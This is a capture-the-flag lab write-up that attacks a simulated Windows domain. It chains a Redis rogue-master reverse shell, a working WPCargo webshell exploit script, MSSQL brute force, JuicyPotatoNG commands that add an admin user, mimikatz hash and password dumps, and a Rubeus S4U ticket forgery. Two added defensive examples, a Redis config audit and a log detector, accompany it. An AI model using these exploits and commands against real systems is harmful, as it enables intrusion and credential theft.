春秋云镜-Brute4Road

This post was last updated on the evening of September 6, 2025.

Redis master-slave replication, CVE-2021-25003, MSSQL, S4U forgery

Information gathering

fscan

The scan turned up a few things: FTP anonymous login and unauthenticated Redis access.

[+] ftp 39.98.116.201:21:anonymous
[->]pub
[+] Redis 39.98.116.201:6379 unauthorized file:/usr/local/redis/db/dump.rdb

FTP anonymous login

ftp 39.98.116.201
anonymous:anonymous

There is a pub directory, but it is empty.

Getting a shell via Redis master-slave replication

Port 6379 is open, so connect to it

redis-cli -h 39.98.116.201

I planned to write a cron job for a reverse shell, but did not have the permissions.

Use master-slave replication to get a shell with **redis-rogue-server**

python3 redis-rogue-server.py --rhost 39.98.116.201 --rport 6379 --lhost IP --lport 7788 --exp exp.so

The reverse shell connected back. flag01 was found under /home/redis/flag, but the current user had no permission to read it.
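A defensive counterpart to the replication abuse above, added here and not part of the original writeup: an audit of a redis.conf against the settings that let this host be reached without a password with SLAVEOF/MODULE still enabled. Both configs are constructed samples; the hardened one uses rename-command to disable the commands a rogue master depends on (Redis 6+ ACLs are an alternative, not shown).

```python
from typing import Dict, List

# Commands a rogue master relies on in a replication-based takeover.
RISKY_COMMANDS = ("slaveof", "replicaof", "module", "config")

def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to its values; rename-command may repeat."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            conf.setdefault(key.lower(), []).append(value.strip())
    return conf

def audit_redis_conf(text: str) -> List[str]:
    """Return findings; an empty list means every check passed."""
    conf = parse_conf(text)
    findings: List[str] = []
    # Without a bind directive Redis listens on every interface.
    addrs = " ".join(conf.get("bind", ["0.0.0.0"])).split()
    if any(a.lstrip("-") in ("0.0.0.0", "*", "::", "::*") for a in addrs):
        findings.append("bind: listens on all interfaces")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not conf.get("requirepass", [""])[-1].strip('"'):
        findings.append("requirepass: no password set")
    # `rename-command FOO ""` disables FOO; any other rename at least hides it.
    renamed = {v.split()[0].lower() for v in conf.get("rename-command", []) if v.split()}
    for cmd in RISKY_COMMANDS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd.upper()} still exposed")
    return findings

WEAK_CONF = """# constructed sample: stock config reachable from the internet
port 6379
protected-mode no
dir /usr/local/redis/db
"""

HARDENED_CONF = """# constructed sample: loopback only, authenticated, risky commands disabled
bind 127.0.0.1 -::1
protected-mode yes
requirepass "REPLACE_WITH_A_LONG_RANDOM_SECRET"
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG ""
"""
```

Running `audit_redis_conf(WEAK_CONF)` lists the all-interfaces bind, disabled protected mode, missing password and the four exposed commands; the hardened sample returns no findings.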

Check SUID binaries

find / -user root -perm -4000 -print 2>/dev/null

Found that base64 could be used for privilege escalation. I accidentally dropped the shell (lesson learned: I now set up persistence properly), then brought the host online in vshell.

base64 "flag01" | base64 --decode

flag01: flag{07221d6f-5129-47f0-85ea-0c691642d351}

CVE-2021-25003

Uploaded fscan and frp; ifconfig showed the internal IP to be 172.22.2.7.

[redis@centos-web01 tmp]$ ./FScan_2.0.1_linux_x64 -h 172.22.2.7/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[1.9s] 已选择服务扫描模式
[1.9s] 开始信息扫描
[1.9s] CIDR范围: 172.22.2.0-172.22.2.255
[1.9s] generate_ip_range_full
[1.9s] 解析CIDR 172.22.2.7/24 -> IP范围 172.22.2.0-172.22.2.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] 正在尝试无监听ICMP探测...
[1.9s] ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[1.9s] 当前用户权限不足,无法发送ICMP包
[1.9s] 切换为PING方式探测...
[2.9s] [*] 目标 172.22.2.16 存活 (ICMP)
[3.0s] [*] 目标 172.22.2.18 存活 (ICMP)
[5.0s] [*] 目标 172.22.2.3 存活 (ICMP)
[5.0s] [*] 目标 172.22.2.34 存活 (ICMP)
[6.0s] [*] 目标 172.22.2.7 存活 (ICMP)
[7.9s] 存活主机数量: 5
[7.9s] 有效端口数量: 233
[7.9s] [*] 端口开放 172.22.2.16:80
[7.9s] [*] 端口开放 172.22.2.16:1433
[7.9s] [*] 端口开放 172.22.2.3:389
[7.9s] [*] 端口开放 172.22.2.3:445
[7.9s] [*] 端口开放 172.22.2.3:139
[7.9s] [*] 端口开放 172.22.2.3:135
[7.9s] [*] 端口开放 172.22.2.3:88
[7.9s] [*] 端口开放 172.22.2.16:445
[7.9s] [*] 端口开放 172.22.2.16:139
[7.9s] [*] 端口开放 172.22.2.16:135
[7.9s] [*] 端口开放 172.22.2.18:80
[7.9s] [*] 端口开放 172.22.2.18:22
[7.9s] [*] 端口开放 172.22.2.34:445
[7.9s] [*] 端口开放 172.22.2.34:139
[7.9s] [*] 端口开放 172.22.2.34:135
[7.9s] [*] 端口开放 172.22.2.18:139
[7.9s] [*] 端口开放 172.22.2.18:445
[7.9s] [*] 端口开放 172.22.2.7:6379
[7.9s] [*] 端口开放 172.22.2.7:80
[7.9s] [*] 端口开放 172.22.2.7:22
[7.9s] [*] 端口开放 172.22.2.7:21
[10.9s] 扫描完成, 发现 21 个开放端口
[10.9s] 存活端口数量: 21
[10.9s] 开始漏洞扫描
[11.0s] [*] 网站标题 http://172.22.2.7 状态码:200 长度:4833 标题:Welcome to CentOS
[11.0s] [+] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[11.0s] [*] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
IPv4地址:
└─ 172.22.2.34
[11.0s] [*] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
IPv4地址:
└─ 172.22.2.16
[11.0s] [*] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
IPv4地址:
└─ 172.22.2.3
[11.0s] [*] 网站标题 http://172.22.2.16 状态码:404 长度:315 标题:Not Found
[11.1s] [+] NetBios 172.22.2.34 XIAORANG\CLIENT01
[11.1s] POC加载完成: 总共387个,成功387个,失败0个
[11.1s] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[11.1s] [+] NetBios 172.22.2.3 DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[11.1s] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[11.1s] [+] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[11.1s] [+] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[11.2s] [+] FTP服务 172.22.2.7:21 匿名登录成功!
[11.2s] [+] SMB认证成功 172.22.2.18:445 administrator:admin123
[11.4s] SMB2共享信息 172.22.2.18:445 administrator Pass:P@ssword123 共享:[print$ IPC$]
[11.6s] [+] SMB认证成功 172.22.2.16:445 admin:admin123
[11.7s] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[11.8s] SMB2共享信息 172.22.2.18:445 administrator Pass:root 共享:[print$ IPC$]
[11.8s] SMB2共享信息 172.22.2.18:445 administrator Pass: 共享:[print$ IPC$]
[11.9s] SMB2共享信息 172.22.2.18:445 administrator Pass:admin123 共享:[print$ IPC$]
[12.1s] SMB2共享信息 172.22.2.16:445 admin Pass:root 共享:[ADMIN$ C$ fileshare IPC$]
[12.1s] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[12.1s] SMB2共享信息 172.22.2.18:445 administrator Pass:admin 共享:[print$ IPC$]
[12.1s] SMB2共享信息 172.22.2.18:445 administrator Pass:pass123 共享:[print$ IPC$]
[12.1s] SMB2共享信息 172.22.2.18:445 administrator Pass:Password 共享:[print$ IPC$]
[12.1s] SMB2共享信息 172.22.2.16:445 admin Pass:admin 共享:[ADMIN$ C$ fileshare IPC$]
[12.1s] SMB2共享信息 172.22.2.16:445 admin Pass:admin123 共享:[ADMIN$ C$ fileshare IPC$]
[12.2s] SMB2共享信息 172.22.2.16:445 admin Pass:pass123 共享:[ADMIN$ C$ fileshare IPC$]
[12.2s] SMB2共享信息 172.22.2.16:445 admin Pass:pass@123 共享:[ADMIN$ C$ fileshare IPC$]
[12.2s] SMB2共享信息 172.22.2.16:445 admin Pass:P@ssword123 共享:[ADMIN$ C$ fileshare IPC$]
[12.3s] SMB2共享信息 172.22.2.18:445 administrator Pass:pass@123 共享:[print$ IPC$]
[12.3s] SMB2共享信息 172.22.2.16:445 admin Pass:Password 共享:[ADMIN$ C$ fileshare IPC$]
[12.3s] SMB2共享信息 172.22.2.16:445 admin Pass:password 共享:[ADMIN$ C$ fileshare IPC$]
[12.4s] SMB2共享信息 172.22.2.18:445 administrator Pass:password 共享:[print$ IPC$]
[14.0s] [+] Redis 172.22.2.7:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[14.0s] [+] Redis无密码连接成功: 172.22.2.7:6379
[55.4s] 扫描已完成: 37/37

The following assets were found

172.22.2.3   DC
172.22.2.16  MSSQLSERVER
172.22.2.18  UBUNTU-WEB02
172.22.2.34  CLIENT01

Start with 172.22.2.18: it runs a web service on WordPress, so scan it with wpscan.

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.22.2.18/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>

[+] WordPress theme in use: twentytwentytwo
| Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 2.0
| Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wpcargo
| Location: http://172.22.2.18/wp-content/plugins/wpcargo/
| Last Updated: 2025-07-23T01:11:00.000Z
| [!] The version is out of date, the latest version is 8.0.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 6.x.x (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

The WordPress plugin wpcargo is vulnerable (WPCargo < 6.9.0 - Unauthenticated RCE); a PoC was found

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
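Added detection example, not from the original writeup or the PoC author: it scans Apache combined-format access-log lines for the two-step pattern the PoC above produces, a barcode.php request carrying a filepath= parameter followed by requests to the file it named. The log lines are constructed, and the document root /var/www/html is assumed from the PoC's filepath.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Combined-log prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
BARCODE_PATH = "/wp-content/plugins/wpcargo/includes/barcode.php"
WEBROOT = "/var/www/html"  # assumed document root, taken from the PoC's filepath

def analyze(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (reason, client_ip) alerts in log order."""
    alerts: List[Tuple[str, str]] = []
    written: set = set()  # URL paths barcode.php was asked to write under the web root
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m["target"])
        params = parse_qs(url.query)
        if url.path == BARCODE_PATH and "filepath" in params:
            # barcode.php is only meant to render a barcode; a caller choosing the
            # output path is the vulnerable behaviour this CVE covers.
            fp = params["filepath"][0]
            alerts.append((f"barcode.php called with filepath={fp}", m["ip"]))
            if fp.startswith(WEBROOT + "/") and fp.lower().endswith(".php"):
                written.add(fp[len(WEBROOT):])
        elif url.path in written:
            alerts.append((f"{m['method']} to file written via barcode.php: {url.path}", m["ip"]))
    return alerts

# Constructed Apache access-log lines: one exploitation sequence, two benign hits.
SAMPLE_LOG = [
    '172.22.2.7 - - [13/Aug/2025:17:40:01 +0800] "GET /wp-content/plugins/wpcargo/includes/'
    'barcode.php?text=x1xx1x&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php'
    ' HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '172.22.2.7 - - [13/Aug/2025:17:40:02 +0800] "POST /webshell.php?1=system HTTP/1.1" 200 1020 "-" "python-requests/2.31.0"',
    '10.0.0.5 - - [13/Aug/2025:17:41:00 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=12345&size=2 HTTP/1.1" 200 2300 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Aug/2025:17:42:00 +0800] "GET /index.php/feed/ HTTP/1.1" 200 4833 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for reason, ip in analyze(SAMPLE_LOG):
        print(f"[{ip}] {reason}")
```

A legitimate barcode render (the 10.0.0.5 line) carries no filepath parameter and is not flagged, so the rule keys on the parameter rather than on the endpoint.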

Connected with AntSword (蚁剑) and found the database configuration in wp-config.php

wpuser:WpuserEha8Fgj9

flag{c757e423-eb44-459c-9c63-7625009910d8}

MSSQL brute force

Export the data from S0meth1ng_y0u_m1ght_1ntereSted under f1aagggghere

It contains id and password columns.

Brute-force 172.22.2.16 with it and obtain the password ElGNkOiC

sa:ElGNkOiC

AntSword could connect but returned no data; connecting with MDUT worked, but only with mssqlserver privileges.

Adding a user directly does not work, so check the privileges

whoami /priv

SeImpersonatePrivilege is enabled, which points to a Potato-style privilege escalation (see Windows privilege escalation - SeImpersonatePrivilege). Upload the tool to the machine.

C:\迅雷下载\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c whoami > C:\迅雷下载\butt3rf1y.txt" & type C:\迅雷下载\butt3rf1y.txt

C:\迅雷下载\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c net user butt3rf1y butt3rf1y /add > C:\迅雷下载\butt3rf1y.txt" & type C:\迅雷下载\butt3rf1y.txt

C:\迅雷下载\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c net localgroup administrators butt3rf1y /add > C:\迅雷下载\butt3rf1y.txt" & type C:\迅雷下载\butt3rf1y.txt

flag03: flag{44e05a29-8554-4b0a-85c6-ec3811ef6199}

S4U: forging a privileged ST to take the domain controller

Dump hashes with mimikatz

privilege::debug
sekurlsa::logonpasswords

The domain user William and his credentials were found, but the login did not work.

Authentication Id : 0 ; 283669 (00000000:00045415)
Session : Interactive from 1
User Name : William
Domain : XIAORANG
Logon Server : DC
Logon Time : 2025/8/13 17:49:06
SID : S-1-5-21-2704639352-1689326099-2164665914-1106
msv :
[00000003] Primary
* Username : William
* Domain : XIAORANG
* NTLM : 8853911fd59e8d0a82176e085a2157de
* SHA1 : e4fd18cfd47b9a77836c82283fb560e6f465bc40
* DPAPI : da3fc187c1ff105853ec62c10cddd26b
tspkg :
wdigest :
* Username : William
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : William
* Domain : XIAORANG.LAB
* Password : Willg1UoO6Jt
ssp :
credman :

as well as the domain computer account MSSQLSERVER$

Authentication Id : 0 ; 8099440 (00000000:007b9670)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/8/13 20:19:01
SID : S-1-5-90-0-4
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : aca5ebbdd95f1c76b5d201c37d3d345b
* SHA1 : 41ef4222b0a2dd8b549ec6b9fe8de87cd6eff68e
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 9a 5a 6d e6 da f8 de b8 91 89 0c f7 70 8d ec 42 05 c5 a0 5f c3 46 3b 37 bf 50 c9 2f 9e b0 94 dd 8a 06 8b 15 a2 e0 4d f9 e9 34 3d 3a eb ef 9c 53 6a a5 4a c9 2e 86 7f d7 92 6e 76 46 04 03 18 9d 8c 6f fd 7e d2 7b a6 34 b6 69 2b c1 cd 94 3e 95 69 4d ff ad 24 8b 15 e0 83 99 dc 4b 8d fd a5 d5 54 62 0c dd fc 9c 8e 8a 86 9f ad 91 8d 41 1f 9c 37 e0 86 db ff b7 c2 ae 81 68 ec 58 8e 64 01 cf 8d aa b5 45 96 2b 0c eb 76 72 01 57 03 26 54 2a 0a f7 38 cb da 8c 73 32 ac 12 c6 71 50 3c e9 7a 3e 46 3e 4e d8 75 d3 d4 b7 e4 23 8e 37 02 b5 68 a1 10 cc 7c f9 3c 37 b5 a1 3b 14 7c dc 81 64 9e 09 b5 85 22 85 b4 1b d9 4f f4 a9 e2 1a 57 25 1f f2 ad 7c ee da cd 2b 1a ab 76 ba 76 5a 3d 8e e9 ea c2 d3 8a 87 53 84 d6 4e 7e 55 6d 9e fe 36 e6
ssp :
credman :

Dump the domain information and inspect it

proxychains bloodhound-python -d XIAORANG.LAB -u 'MSSQLSERVER$' --hashes aca5ebbdd95f1c76b5d201c37d3d345b:aca5ebbdd95f1c76b5d201c37d3d345b -dc DC.XIAORANG.LAB -c all -ns 172.22.2.3 --dns-tcp --zip

The domain controller can be taken by forging a ST via S4U: use Rubeus to request a service ticket for itself, obtain the ticket and inject it, all in one step.

.\Rubeus.exe s4u /user:MSSQLSERVER$ /rc4:aca5ebbdd95f1c76b5d201c37d3d345b /domain:xiaorang.lab /dc:DC.xiaorang.lab  /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt

Browse into the domain controller's directory via the Windows file share UNC path

\\DC.xiaorang.lab\C$\Users\Administrator\flag

flag04: flag{126d2f61-43e0-42e7-b6ff-3f61946c3f67}

http://example.com/2025/08/13/春秋云镜-Brute4Road/
Author: butt3rf1y
Published: August 13, 2025